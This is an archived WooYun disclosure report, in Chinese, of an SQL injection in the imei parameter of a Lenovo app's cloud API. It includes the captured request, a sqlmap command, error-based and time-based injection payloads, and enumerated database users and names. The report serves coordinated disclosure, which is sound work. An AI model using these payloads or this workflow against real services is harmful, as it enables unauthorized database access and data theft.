乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-02-21: 细节已通知厂商并且等待厂商处理中 2015-02-22: 厂商已经确认,细节仅向厂商公开 2015-02-25: 细节向第三方安全合作伙伴开放 2015-04-18: 细节向核心白帽子及相关领域专家公开 2015-04-28: 细节向普通白帽子公开 2015-05-08: 细节向实习白帽子公开 2015-05-23: 细节向公众公开
联想某APP服务云端接口存在SQL注射漏洞
从百度手机助手下载并安装"乐服务"。
启动该应用,可以发现这条HTTP请求:
POST /Service2.asmx/GetHomePageData HTTP/1.1Content-Length: 129Content-Type: application/x-www-form-urlencodedHost: app.lenovocare.com.cnConnection: Keep-AliveUser-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)announceReadId=0&imei=000000000000000&model=Google&appVersionCode=2015021200&isCountByUmeng=1
经验证,imei参数可注入。
sqlmap.py -r "e:/1.txt" --dbms=mssql --dbs --users --current-user
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: imei (POST) Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: announceReadId=0&imei=000000000000000' AND 4869=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(118)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (4869=4869) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(122)+CHAR(106)+CHAR(113))) AND 'oeHG'='oeHG&model=Google&appVersionCode=2015021200&isCountByUmeng=1 Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: announceReadId=0&imei=000000000000000'; WAITFOR DELAY '0:0:5'--&model=Google&appVersionCode=2015021200&isCountByUmeng=1 Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: announceReadId=0&imei=000000000000000' WAITFOR DELAY '0:0:5'--&model=Google&appVersionCode=2015021200&isCountByUmeng=1---web server operating system: Windows 2008 R2 or 7web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2008current user: 'db_spadmin'database management system users [10]:[*] ##MS_PolicyEventProcessingLogin##[*] ##MS_PolicyTsqlExecutionLogin##[*] db_moto[*] db_sell[*] db_spadmin[*] db_ts[*] imei_reader[*] sa[*] survey_reader[*] tse2e!@#usravailable databases [10]:[*] master[*] model[*] MotoService[*] msdb[*] ReportServer[*] ReportServerTempDB[*] ServiceSell[*] spadmin[*] tempdb[*] ts
新年给个8分至少嘛嘻嘻 ._ .
危害等级:高
漏洞Rank:12
确认时间:2015-02-22 12:00
谢谢您对联想安全工作的支持,我们会尽快修复漏洞
暂无